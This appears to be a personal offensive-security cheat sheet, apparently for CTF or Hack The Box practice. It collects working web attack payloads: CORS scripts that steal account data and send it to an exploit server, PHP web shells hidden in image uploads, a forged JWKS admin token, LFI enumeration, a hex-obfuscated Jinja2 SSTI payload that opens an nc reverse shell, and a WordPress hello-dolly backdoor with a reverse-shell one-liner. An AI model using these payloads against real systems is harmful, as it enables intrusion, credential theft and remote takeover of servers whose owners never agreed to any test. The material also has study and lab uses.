beef

# change port to 3000
> vi /etc/beef-xss/config.yaml
> journalctl -u beef-xss
> systemctl stop beef-xss.service;beef-xss

cors

tools: corscanner, ucors
origin reflection

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','$url/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

null origin

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','$url/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

insecure protocol

<script>
    document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

graphql

graphqlmap

> graphqlmap -u http://<ip>/graphql
graphqlmap> dump_via_introspection

https://github.com/doyensec/inql, can be used to introspect and dump the schema into a json

> inql -t http://<ip>/graphql

https://gitlab.com/dee-see/graphql-path-enum, used to find path to the target object

> ./tools/graphql-path-enum --introspect-query-path <ip>/schema-2022-08-09-1660086719.json -t task

https://github.com/IvanGoncharov/graphql-voyager, visualise the schema
create a schema using inql and serve the html using python3 -m http.server 80

<!DOCTYPE html>
<html>
  <meta content="text/html;charset=utf-8" http-equiv="Content-Type">
  <meta content="utf-8" http-equiv="encoding">
  <head>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/graphql-voyager/dist/voyager.css"/>
    <script src="https://cdn.jsdelivr.net/npm/react@16/umd/react.production.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/react-dom@16/umd/react-dom.production.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/graphql-voyager/dist/voyager.min.js"></script>
  </head>
  <body>
    <div id="voyager">Loading...</div>
    <script>
      function introspectionProvider(query) {
        return fetch('schema-2022-08-09-1660086719.json', {
          method: 'get',
          headers: { 'Content-Type': 'application/json' },
        }).then((response) => response.json());
      }

      GraphQLVoyager.init(document.getElementById('voyager'), {
        introspection: introspectionProvider,
      });
    </script>
  </body>
</html>

https://github.com/dolevf/graphql-cop, find potential vulnerabilities

> python3 graphql-cop.py -t http://<ip>/graphql -o json | tee log.json

https://github.com/nikitastupin/clairvoyance, dump schema when introsepction is disabled

> python3 -m clairvoyance -vv -o payload.json -w /usr/share/wordlists/SecLists/Discovery/Web-Content/graphql.txt http://<ip>/graphql

Image upload

https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
rename extension
add GIF89a before payload

GIF89a;
<?
system($_GET['cmd']);//or you can insert your complete shell code
?>

Add comment

> exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg

JWKS Spoofing

https://mkjwk.org/
generate private/public key
generate/modify token
host jwks.json file
attack

from jwcrypto import jwk, jwe, jwt
from jwcrypto.common import json_encode, json_decode

private_key = jwk.JWK.generate(kty='RSA', alg='RS256', size=4096)
public_key = private_key.export(private_key=False)
print(public_key)
token = jwt.JWT(
    header={"typ": "JWT", "alg": "RS256", "jku": "http://hackmedia.htb/static/../redirect?url=<ip>/jwks.json?00"},
    claims={"user": "admin"}
)
token.make_signed_token(private_key)
print(token.serialize())

LFI

enum process using LFI

> curl http://<ip>/index.php?page=../../../../../../../../../../proc/[100-500]/cmdline

using wfuzz

> wfuzz http://<ip>/?path=FUZZ -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt

SSTI

jinja2 template injection

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 4444 >/tmp/f')|attr('read')()}}

XSS

wordpress

wpscan

> wpscan --url http://<ip>/ -e vp,vt,u,cb,dbe
> wpscan --url https://<ip>/ -e vp,vt,u,cb,dbe --disable-tls-checks

# agressive detection
> wpscan --url http://<ip> -e p,u --plugins-detection aggressive

backdoor through hello-dolly

* update http://<ip>/wp-admin/plugin-editor.php?plugin=hello.php&Submit=Select
* activate plugin
* browse to: http://<ip>/wp-content/plugins/hello-dolly/hello.php?cmd=ls
* apply url encoded reverse shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 4444 >/tmp/f

Check wp-config.php for db password